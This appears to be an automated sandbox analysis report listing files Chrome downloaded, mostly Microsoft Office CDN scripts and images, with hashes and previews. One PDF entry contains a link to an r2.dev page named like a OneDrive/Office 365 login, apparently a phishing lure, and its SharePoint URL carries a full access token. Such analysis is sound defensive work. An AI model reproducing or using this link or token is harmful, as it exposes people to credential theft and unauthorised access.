                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[40730],{486232:(e,t,n)=>{n.r(t),n.d(t,{createOnePlayer:()=>l,loadMtcManager:()=>s.a,onePlayerVersion:()=>r.A,prefetchManifest:()=>c.D,prefetchManifestLite:()=>c.v,prewarmResources:()=>o.k,stringToMediaVisibility:()=>d.H});var a=n(334492),i=n(590830),r=n(229103),o=n(803874),s=n(498),c=n(376965),d=n(433875);function l(e){return new a.i(e,i.GI)}}.,836365:(e,t,n)=>{n.r(t),n.d(t,{createIc3AmsOnePlayer:()=>v,createOdspOnePlayer:()=>g,createOdspOnePlayerWithoutPlugins:()=>b,loadMtcManager:()=>_.a,onePlayerVersion:()=>p.A,prefetchManifest:()=>h.D,prewarmResources:()=>m.k});var a=n(171125),i=n(334492),r=n(561362),o=n(730693),s=n(860399),c=n(651363),d={mediaType:"video"},l=function(){function e(e,t){this.options=e,this.telemetryContext=t,this._itemTitle=new c.h(void 0),this._captionsAvailable=new c.h(void 0),this._audioFiles=new c.h(void 0),this.loadDataForPhase=function(e){return Promise.resolve()};v
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (7246)
                                                          Category:downloaded
                                                          Size (bytes):34247
                                                          Entropy (8bit):5.434345475260599
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:4170826C144785B4E06474AB6AE2FFB6
                                                          SHA1:E8CA2CECE7EF3BC371A96D824BD596F0A8B90D87
                                                          SHA-256:E10592A62E8C855BF41E47A1EB087E3F14FFC79FE5B226D0CC1F72A9D3D2DFC0
                                                          SHA-512:4BB07342912CB0C501FE5FAF9F8BF4E0077694EDEEF101C3CF04862D8A9F07283BEF726B923E19214AB6B1D2B0C804D0564D93EB9CF8E23DE87DB7F68A18059B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/145.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[145],{4084:function(e,t,n){n.d(t,{a:function(){return i}});var a=n("fui.util_175"),i=(0,a.e_)(function(e,t,n,i){return{root:(0,a.ZC)("ms-ActivityItem",t,e.root,i&&e.isCompactRoot),pulsingBeacon:(0,a.ZC)("ms-ActivityItem-pulsingBeacon",e.pulsingBeacon),personaContainer:(0,a.ZC)("ms-ActivityItem-personaContainer",e.personaContainer,i&&e.isCompactPersonaContainer),activityPersona:(0,a.ZC)("ms-ActivityItem-activityPersona",e.activityPersona,i&&e.isCompactPersona,!i&&n&&2===n.length&&e.doublePersona),activityTypeIcon:(0,a.ZC)("ms-ActivityItem-activityTypeIcon",e.activityTypeIcon,i&&e.isCompactIcon),activityContent:(0,a.ZC)("ms-ActivityItem-activityContent",e.activityContent,i&&e.isCompactContent),activityText:(0,a.ZC)("ms-ActivityItem-activityText",e.activityText),commentText:(0,a.ZC)("ms-ActivityItem-commentText",e.commentText),timeStamp:(0,a.ZC)("ms-ActivityItem-timeStamp",e.timeStamp,i&&e.isCompactTimeStamp)}})
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:RIFF (little-endian) data, Web/P image
                                                          Category:downloaded
                                                          Size (bytes):47136
                                                          Entropy (8bit):7.993540910526829
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:6B8A7E8B419C5A36FB12A98266D0849D
                                                          SHA1:7CDA6611D700E1FFE0764C81B79225C1FD4C61A4
                                                          SHA-256:E91FEE23BCFAE78B7296D495ABF0358581632B33658231546C952A78547C3C08
                                                          SHA-512:1F9BDF6748EE8A7B234BBEE1016EF830A5C5257D58DF11019BBC926EF4CA293E23CDF857BB3E9AAAA98AED4801E77B63CD6BC1B13DB58E1A7987F992711C0437
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_filter_v3_dark.webp
                                                          Preview:RIFF....WEBPVP8X..............ALPH.z.....m.I...{K...U...".?.....W.^U...I{ .=.....Q(*(....5.ED...X..9,..5..'....^.14..$......m#I......A...X..3.H..u1.d.P...:@..R.n.z.f.33..*ku:/}.....@.6R..7.!a...#&.a..i....d.?.t."9..m....J*....{.3...==.23c.n.@*.RR...1..9f.R..#..l[U$..* Z..s...=..[.$K.$..N....[0@*3.xf...SG.-.........}.....m...q..:.H(.jV.xF.....a.O.+._.......<......k.*..,...!...m`...C...........?..8......../.@W...5.{..[.......;....:.*..q.......Q.R..A~.}Yk..^......D.......l02...sv.p+h.%~Cs...0.^.....LNj:.j.$_<..Oj...1t.Q.f.n.q..m.[.^}.z..Rh..{.Y.&..5.+...T.P.......V.?heJ..a~.............h...,.dX`..+p.~...q.@...^...F....b...........f.........j......?i..zE`v..Wse|..(.I$8.....&..9P~5EG.4.CG.l;5..C.&...%.p... ..((."..uB..[#.KE..RQ.F..,*.......\D).oW4...{...H..$..'.r.7./.'....1_...R.)..h...h.....UX3..../...D[ei.I..8......T<_.r...7.z..N._..B.Bs..zN.(......d.J@r.......~.S..U*p..w^i....Y..."....%...H...A.l.x|U..WY..6.......:.....M/P.Z..0...pP5P
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:PDF document, version 1.7, 1 pages
                                                          Category:downloaded
                                                          Size (bytes):32784
                                                          Entropy (8bit):7.177490153432458
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:47969C8FFED36A8D336F094A87F62E73
                                                          SHA1:4836BECB8BABB6B86596BA3BE3F05224C922DCA3
                                                          SHA-256:1500B85EC2A3EBDB7C70301840C9077BDCC1FFDFCD3AE824DAE2B8250952EA5F
                                                          SHA-512:5D69B7C84AEE6B869743E5A38654224D02B27CE4DD90FC9076FB0C8CB2DA856BCBB88E0B902E5625808182C6EBEF6C8CFE2C3B3F9FCE885D06DB047218AD56F3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://westus31-mediap.svc.ms/transform/passthrough?provider=spo&inputFormat=pdf&cs=fFNQTw&docid=https%3A%2F%2Fmyarrowleaf1-my.sharepoint.com%3A443%2F_api%2Fv2.0%2Fdrives%2Fb!OgvKMgJJ9Ea65BeF2BY-V6W1OLarDu1HoCcHG8Sy7LVrRUtZZs2tRJhB4YCxl3mi%2Fitems%2F01264PSCVAJAVZSGAQCVE3HZAIDZ7WQTLE%3Fversion%3DPublished&access_token=v1.eyJzaXRlaWQiOiIzMmNhMGIzYS00OTAyLTQ2ZjQtYmFlNC0xNzg1ZDgxNjNlNTciLCJhdWQiOiIwMDAwMDAwMy0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAvbXlhcnJvd2xlYWYxLW15LnNoYXJlcG9pbnQuY29tQGRhMTM0ODQwLWRiNWEtNDllMy05NDg4LTZmNTU4ZWVmNGFhZSIsImV4cCI6IjE3MzE2Mjg4MDAifQ.CiMKCXNoYXJpbmdpZBIWa1JVM3V5Ykdwa09zbkVSQkZtVnRhQQoICgNzdHASAXQKCgoEc25pZBICMzMSBgjU2zoQARoOMTczLjI1NC4yNTAuOTEiFG1pY3Jvc29mdC5zaGFyZXBvaW50Kix5L0dnSFRqQmtZQzdRY29TQkJ4MXZvdEVFNEUwck9zVGFGdkJXL2pZMGJzPTB6OAFKEGhhc2hlZHByb29mdG9rZW5iBHRydWVyYTBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzJmZjQ4NjljOGY3ODFjMzA0MjE0YjNkODA4MTNlZmZiMjQ2ZmU2NGIzYjQwM2RiZjc3YzNmNmE1NGJkNmIxMTd6ATDCAWEwIy5mfG1lbWJlcnNoaXB8dXJuJTNhc3BvJTNhYW5vbiMyZmY0ODY5YzhmNzgxYzMwNDIxNGIzZDgwODEzZWZmYjI0NmZlNjRiM2I0MDNkYmY3N2MzZjZhNTRiZDZiMTE3.m4_iJxDLqP9rOpKWfHdO3RgFgYAMKLvEuJoAhAjyEs4&cTag=%22c%3A%7B992B48A0-1018-4915-B3E4-081E7F684D64%7D%2C1%22
                                                          Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 31 0 R/MarkInfo<</Marked true>>/Metadata 198 0 R/ViewerPreferences 199 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 1/Kids[ 3 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Annots[ 4 0 R] /Resources<</ExtGState<</GS6 6 0 R/GS13 13 0 R>>/XObject<</Image7 7 0 R/Image9 9 0 R/Image14 14 0 R/Image16 16 0 R/Image18 18 0 R/Image20 20 0 R/Image28 28 0 R/Image29 29 0 R>>/Font<</F1 11 0 R/F2 22 0 R/F3 24 0 R/F4 26 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 678 1080] /Contents 5 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Subtype/Link/Rect[ 129.9 848.3 348.76 875.85] /BS<</W 0>>/F 4/A<</Type/Action/S/URI/URI(https://pub-3e795e3d64dd4786b9cd98fa10cef215.r2.dev/0nedrivefaoffice36500O.html) >>>>..endobj..5 0 obj..<</Filter/FlateDecode/Length 2958>>..stream..x..Yo.......;.[..U..c.X.k9^'....E....4:.i...,...9.(.T...l.4............._.{.v_..~
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (5380)
                                                          Category:downloaded
                                                          Size (bytes):8255
                                                          Entropy (8bit):5.414127424626134
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:485681BD1030DB6EFDDB8CD02F401162
                                                          SHA1:0C94D1757BE426BAE8C6BE26AED0D27902BFE30E
                                                          SHA-256:C6F8C9E69F66003D80001449115DE7C59F82F0366A4BD2D970AA80154F500431
                                                          SHA-512:8B30633C7995EB429C11FDCA4F44E0FD3317C4ACF5F6E97C3434245149C57BA04087E319DD2F61B9B3948ED603701D570E599D4560787FD7D76E2CF743B948B4
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/41800.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[41800],{213678:(e,t,n)=>{n.d(t,{a:()=>l});var a=n(171125),i=n(539155),r=n(74889),o=n(22426),s=n(794580),c=n(3036),d=n(186137);function l(e,t){void 0===t&&(t={});var n=t.factoryOptions,l=(void 0===n?{}:n).defaultProp,f=function(n){var c,d,l,f,p=(c=t.displayName,d=i.useContext(o.z),l=t.fields,f=["theme","styles","tokens"],s.X.getSettings(l||f,c,d.customizations)),m=t.state;m&&(n=(0,a.__assign)((0,a.__assign)({},n),m(n)));var _=n.theme||p.theme,h=u(n,_,t.tokens,p.tokens,n.tokens),b=function(e,t,n){for(var a=[],i=3;i<arguments.length;i++)a[i-3]=arguments[i];return r.KW.apply(void 0,a.map(function(a){return"function"==typeof a?a(e,t,n):a}))}(n,_,h,t.styles,p.styles,n.styles),g=(0,a.__assign)((0,a.__assign)({},n),{styles:b,tokens:h,_defaultStyles:b,theme:_});return e(g)};return f.displayName=t.displayName||e.name,l&&(f.create=(0,c.ww)(f,{defaultProp:l})),(0,d.k)(f,t.statics),f}function u(e,t){for(
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (9848)
                                                          Category:downloaded
                                                          Size (bytes):10969
                                                          Entropy (8bit):5.466197561194345
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:6B87F5EB76261C731130BE55B55BE4F0
                                                          SHA1:8D8D5DC341ACA8DB8BAFE2B25D03D20A2943A625
                                                          SHA-256:D422002160858AB6EB1DAC52CE76C30D196E359AEDC5CC2EEC3888433D6E4DA6
                                                          SHA-512:07E82B7C286ABC3699E6E00EC16022B254324614F7C8B2BEB4B68084244C7EFB7DCAFC03194F8DBCF08E7F930719815B552F315A315E55CFA7AE49F22E305A25
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/19.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[19],{4948:function(e,t,n){n.d(t,{a:function(){return c}});var a=n(807),i=n(333),r=n(2056),o=n(226),s=n(3993);function c(e){if(e&&0!==e.length){for(var t=[],n=0,c=(0,s.a)(e);n<c.length;n++){var d=c[n],l=d,u=!1;(0,r.a)(l)&&(l=(0,r.b)(l),u=!0);var f=i.a[l];"number"==typeof f&&f>0?t.push(u?-f:f):"folder"===l?t.push(u?i.a["!folder"]:i.a.folder):"media"===l?t.push(u?i.a["!media"]:i.a.media):"onenote"===l?t.push(u?i.a["!onenote"]:i.a.onenote):t.push(d.toUpperCase())}return(0,a.d)({filters:t},{fileTypeIconMap:o.a})}}}.,4947:function(e,t,n){n.r(t),n.d(t,{constructGetItemContext:function(){return z},constructGetItemSetContext:function(){return j},getContentTypes:function(){return G},getFolderContentTypes:function(){return K},getItemContextPostDataContext:function(){return V},spDataSourceConfigurationFacet:function(){return s.od},spPrefetchDataConfigurationFacet:function(){return s.Pd}});var a=n("tslib_538"),i=n(22),r=n
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (57564)
                                                          Category:downloaded
                                                          Size (bytes):537197
                                                          Entropy (8bit):5.518099681148658
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:EB739CE82703447965D736960A3A2408
                                                          SHA1:9FDB010B18EB058F7F8FE827A672CE73DCBFB710
                                                          SHA-256:969F3CB33E1A916D087D458C8FBEC537694A4E8B8B2A6390B8B070AE51B3E312
                                                          SHA-512:BDE647417405BE398B1D0277B3C985CD6D198FA00CBCCEEAB7BC6C04D4F455087701E9711BA1EAE13712BAF4351D4EB556173DFD2DAE8A81A2474BF6D4560258
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.components/fui.co-b53f2a17.js
                                                          Preview:/*! For license information please see fui.co-b53f2a17.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.co"],{"fui.co_340":e=>{var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,a=Object.prototype.propertyIsEnumerable;function i(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var a={};return"abcdefghijklmnopqrst".split("").forEach(function(e){a[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},a)).join("")}catch(e){return!1}}()?Object.assign:function(e,r){for(var o,s,c=i(e),d=1;d<arguments.length;d++){for(var l in o=Object(arguments[d]))n.call(o,l)&&(c[l]=o[l]);
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4979)
                                                          Category:downloaded
                                                          Size (bytes):11847
                                                          Entropy (8bit):5.419663865365596
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:719D6B3373858CE2F6D550FB7494BDF2
                                                          SHA1:4159AC2ACC76A3B96455B15DEF7BF6083ED961FC
                                                          SHA-256:88D3C80A3867A560EEF443209EC1F34AEA8A084084BD4026F4AF4D2BAD586442
                                                          SHA-512:4145890655B4935DF7A4D97DA0A5D1D361B26EBCAC34026BD2BEBB96C5AF9AE00DD772E9428415A25BEDDC0AC1F8CDF4E74C9CCBE301FAC1D3D8DB81E80CDE34
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/97386.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[97386],{25424:(e,t,n)=>{n.d(t,{x:()=>o});var a=n(995505),i=n(35210),r=n(750124),o=function(){function e(){}return e.setSlot=function(t,n,i,r,o){if(void 0===i&&(i=!1),void 0===r&&(r=!1),void 0===o&&(o=!0),t.color||!t.value)if(o){var s=void 0;if("string"==typeof n){if(!(s=(0,a.n)(n)))throw new Error("color is invalid in setSlot(): "+n)}else s=n;e._setSlot(t,s,i,r,o)}else t.color&&e._setSlot(t,t.color,i,r,o)},e.insureSlots=function(t,n){for(var a in t)if(t.hasOwnProperty(a)){var i=t[a];if(!i.inherits&&!i.value){if(!i.color)throw new Error("A color slot rule that does not inherit must provide its own color.");e._setSlot(i,i.color,n,!1,!1)}}},e.getThemeAsJson=function(e){var t={};for(var n in e)if(e.hasOwnProperty(n)){var a=e[n];t[a.name]=a.color?a.color.str:a.value||""}return t},e.getThemeAsCode=function(t){return e._makeRemainingCode("loadTheme({\n palette: {\n",t)},e.getThemeAsCodeWithCreateT
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):3106
                                                          Entropy (8bit):4.5960119219646725
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:28271601DFEC8047BB170A479B0EF249
                                                          SHA1:0D0090CF895002EB0FA5F48B1252F31105C0D363
                                                          SHA-256:6FB35BAC67A53E799212124F8364C90F751316040A2C44EDBEA7D52B9F057DE4
                                                          SHA-512:7A630777009CBECADDE82188B0DC174BEF151F067BEB4F20762FA00FF51E02AE8556704B4A1078188B01DEF7444B30DF407F8346207B114D012B8EFFCFCA57F8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_result_dark.svg
                                                          Preview:<svg width="160" height="160" viewBox="0 0 160 160" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M27.4 44.8C37.0098 44.8 44.8 37.0098 44.8 27.4C44.8 17.7902 37.0098 10 27.4 10C17.7902 10 10 17.7902 10 27.4C10 37.0098 17.7902 44.8 27.4 44.8Z" fill="#33312D"/>..<path d="M64.3004 98.8C83.8513 98.8 99.7004 82.9509 99.7004 63.4C99.7004 43.8491 83.8513 28 64.3004 28C44.7495 28 28.9004 43.8491 28.9004 63.4C28.9004 82.9509 44.7495 98.8 64.3004 98.8Z" fill="#797673"/>..<path d="M29.5996 53C31.7996 54.1 34.3996 54.7001 36.9996 54.7001C46.5996 54.7001 54.3996 46.9 54.3996 37.3C54.3996 34.6 53.7996 32 52.6996 29.8C41.6996 33.2 32.9996 41.9 29.5996 53Z" fill="#605D5A"/>..<path d="M102.1 40.7C89.2003 19.4 61.6003 12.6 40.3003 25.5C19.0003 38.4 12.2003 66 25.0003 87.3C37.9003 108.6 65.6003 115.4 86.8003 102.5C108.2 89.7 115 62 102.1 40.7ZM80.0003 91.2C65.0003 100.3 45.5003 95.4 36.4003 80.5C32.1003 73.4 30.9003 65.3 32.5003 57.8C34.1003 49.4 39.2003 41.7 47.1003 36.9C62.1003 27.8 81.6003
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text
                                                          Category:downloaded
                                                          Size (bytes):186
                                                          Entropy (8bit):5.26740678018041
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:2393D7D357B35E2FE63C5D0EB7E404A4
                                                          SHA1:B5B2E23F6A7D9CC38933CFE42CEE6F766CDA96B2
                                                          SHA-256:E122DA2F4592D38E10E95481384A4F5C166201ACAB6863AE452DF49A582A840F
                                                          SHA-512:78F7FAC8EFFF7A5AE1BA894555E26A6A8F10F947612830EB610D9FE346B5FA5CFD7FCEC4CC2788405B46772E156DAD4D7157F0605C32803202F4F3AD7B676C1D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/189.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[189],{1976:(e,t,n)=>{n.r(t);var a=n("react-lib"),i=n("react-dom-lib");window.React=a,window.ReactDOM=i}.}]);
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (688)
                                                          Category:downloaded
                                                          Size (bytes):693
                                                          Entropy (8bit):5.261564618465793
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D5120A917069B1247E87BC4DC13179A1
                                                          SHA1:6025DA9DEDF4B1C1190E946FF9865288808D9826
                                                          SHA-256:BBC390495A92FCAFB77001960C1AD50F15B2094A9790207C6C55451260C04DDC
                                                          SHA-512:0563B28B00C636A3BC4B01C3A9171E1FCA03F24F7DB760F864A55FB763A3F928FC8156B9AAC816F0EFF520C7EAAD055BC90F1605EF6F248446294BF05D343A12
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/file-browser-odb-meta-os/261.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[261],{2382:(e,t,n)=>{n.r(t),n.d(t,{resourceKey:()=>f});var a=n(113),i=n(66),r=n(308),o=n(2),s=n(13),c=n(1663),d=n(34),l=n(1261),u=n(165),f=new o.a({name:"DropActionControlHandler",factory:new s.a(function(e,t){if((0,d._i)(d.zh))return{};if(t.handlers&&function(e,t){var n=(0,u.a)(e);if(n&&t.itemKey){var o=(0,l.a)(e,{itemKey:t.itemKey}).itemKey;if(o){var s=a.a.deserialize(o).webAbsoluteUrl;return new r.a({},{pageContext:n}).getUrlParts({webUrl:s}).geoRelation===i.a.crossGeo}}return!1}(e,t)){for(var n=[],o=0,s=t.handlers;o<s.length;o++){var f=s[o];f.key!==c.a.key&&n.push(f)}return{handlers:n}}return{}})})}.}]);
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):3932
                                                          Entropy (8bit):4.37799644488752
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:D41EE9813A334F89E963EF8CCAE66B86
                                                          SHA1:0BA2BAE19C3175B48095EB6CB9B703C095999FD9
                                                          SHA-256:D6ECB157B246102B938294E2C71CDBDF854A433BCD2CDF590AEBDB39F0BCAE1A
                                                          SHA-512:E6F04B332CB20F1475906F08D976C1DEFBA43357DE7CCCBB3EC65184A23E72021494DBA95C9B78A9794D51AA3E6B0DFF89216066D5849CC45B6456A3F2311928
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_people_dark.svg
                                                          Preview:<svg width="204" height="194" viewBox="0 0 204 194" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1003_115049)">..<path opacity="0.2" d="M162 159C207.024 130.667 207.5 109 179.5 78.0004C171.5 69.1432 188.5 36.9996 179.5 24.5001C169.595 10.743 146.5 1.5 113.5 24.5001C99.7171 34.1064 88 39.9662 70 33.9998C42.5 24.8844 32.5003 48.0004 32.5003 70.5004C32.5003 98.7743 28.0012 102 15.5006 125.5C3.00002 149 15.1691 170.444 41 179.5C72.2157 190.446 133.181 177.131 162 159Z" fill="#797673"/>..<path d="M137.4 100.9L44.4998 125.1C42.3998 125.7 40.1998 124.4 39.5998 122.2L25.4998 68.0002C24.8998 65.9002 26.1998 63.7002 28.3998 63.1002L121.3 38.9002C123.4 38.3002 125.6 39.6002 126.2 41.8002L140.3 96.0002C140.8 98.1002 139.5 100.3 137.4 100.9Z" fill="#605D5A"/>..<path d="M57.3004 85.0998C61.6634 85.0998 65.2004 81.5629 65.2004 77.1998C65.2004 72.8368 61.6634 69.2998 57.3004 69.2998C52.9373 69.2998 49.4004 72.8368 49.4004 77.1998C49.4004 81.5629 52.9373 85.0998 57.3004 85.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (6279)
                                                          Category:downloaded
                                                          Size (bytes):11609
                                                          Entropy (8bit):5.552861178880098
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:A8A5D86D665B04B50DE5509BFA29E7F4
                                                          SHA1:DCFC72C09CF642E0B969056B6FE170655174DB67
                                                          SHA-256:1BF19124476A2784A8B7976AE7E3FFF3B19B0360A9A1BB1E530CF1637A8303F0
                                                          SHA-512:9EC956EAF04B666D5F9ECF6D31268FB6427A9801AC40C0F1B652F8F270DCCF688525498469DF60A30A69AEEF62AC26466FD8103002BEBBFF6B27566D4ECFB0A0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/94190.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[94190],{852896:(e,t,n)=>{n.d(t,{H:()=>m});var a=n(539155),i=n(490539),r=n(904210),o=n(942474),s=n(757086),c=n(87222),d=n(825268),l=n(146748),u=n(502027),f=n(977555),p=n(945945);const m=a.forwardRef((e,t)=>{const n=((e,t)=>{const n=(0,c._O)(e=>e.contentRef),a=(0,c._O)(e=>e.openOnHover),d=(0,c._O)(e=>e.setOpen),l=(0,c._O)(e=>e.mountNode),u=(0,c._O)(e=>e.arrowRef),f=(0,c._O)(e=>e.size),p=(0,c._O)(e=>e.withArrow),m=(0,c._O)(e=>e.appearance),_=(0,c._O)(e=>e.trapFocus),h=(0,c._O)(e=>e.inertTrapFocus),b=(0,c._O)(e=>e.inline),{modalAttributes:g}=(0,s.y)({trapFocus:_,legacyTrapFocus:!h,alwaysFocusable:!_}),v={inline:b,appearance:m,withArrow:p,size:f,arrowRef:u,mountNode:l,components:{root:"div"},root:i.Mk((0,r.g)("div",{ref:(0,o.a)(t,n),role:_?"dialog":"group","aria-modal":!!_||void 0,...g,...e}),{elementType:"div"})},{onMouseEnter:y,onMouseLeave:S,onKeyDown:D}=v.root;return v.root.onMouseEnter=e=>{a
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (6639)
                                                          Category:downloaded
                                                          Size (bytes):16773
                                                          Entropy (8bit):5.191366887955054
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:F3F9A57B0F84DB7CA68158F1587CB095
                                                          SHA1:5191607D60D30B87398A9CE03BD802D2BAE374E7
                                                          SHA-256:F1CF34E692E19FEDEF17EC6CE58194989A7F30E26B2A22BFD5707C1E4787B77D
                                                          SHA-512:E96325A9942F034151FDBDD6F144BACF085CD5CD24D4DD9FEC2B60BB146BC9BBDA624B17D6475F0F8D191EB53CEC6106494ABDC10095581603C41D7E23F68248
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/61251.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[61251],{559836:(e,t,n)=>{n.d(t,{_:()=>o});var a,i=n(171125),r=n(120309),o=(a=Error,(0,i.__extends)(function e(t,n){var i=a.call(this,n&&n.length>0?"".concat(n,": ").concat((0,r.J)(t)):(0,r.J)(t))||this;return i.error=t,void 0!==typeof Object.setPrototypeOf&&Object.setPrototypeOf(i,e.prototype),i},a),function(){function e(e,t,n,a,i,r,o,s,c,d,l,u,f){this.name=e,this.message=t,this.stack=n,this.staticMessage=a,this.isExpected=i,this.statusCode=r,this.clientRequestId=o,this.requestId=s,this.oData=c,this.correlationId=d,this.retryCount=l,this.responseJson=u,this.responseText=f}return e.isServiceError=function(t){return t instanceof e},e}())}.,904877:(e,t,n)=>{n.d(t,{PP:()=>f,Sw:()=>p,rI:()=>h,zT:()=>m});var a=n(171125),i=n(296089),r=n(590037),o=n(143592),s=n(120309),c=n(559836),d=n(880352),l=n(241600),u=(0,i.uk)("Unsupported browser");function f(e){if(e instanceof Error)return(0,l.s)(e.message)&&
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):929
                                                          Entropy (8bit):4.523781989826781
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:E378CB498D216CDC6A95F2861E20BFB6
                                                          SHA1:B58AA022688A73257868A05ACB13C77DBE22FCF6
                                                          SHA-256:C8056299141E58956EDD27694FA1ED6D5084E08A181A22400B961BD3007DE8B5
                                                          SHA-512:7707A711B3770B303316949C231BF9853974170137DB88EA7B350CB43E2E2FD15B34E9D05AC5733E496CEC5B6B60E43091D62747EB18605D4DFD7F57750C9EE0
                                                          Malicious:false
                                                          Reputation:unknown
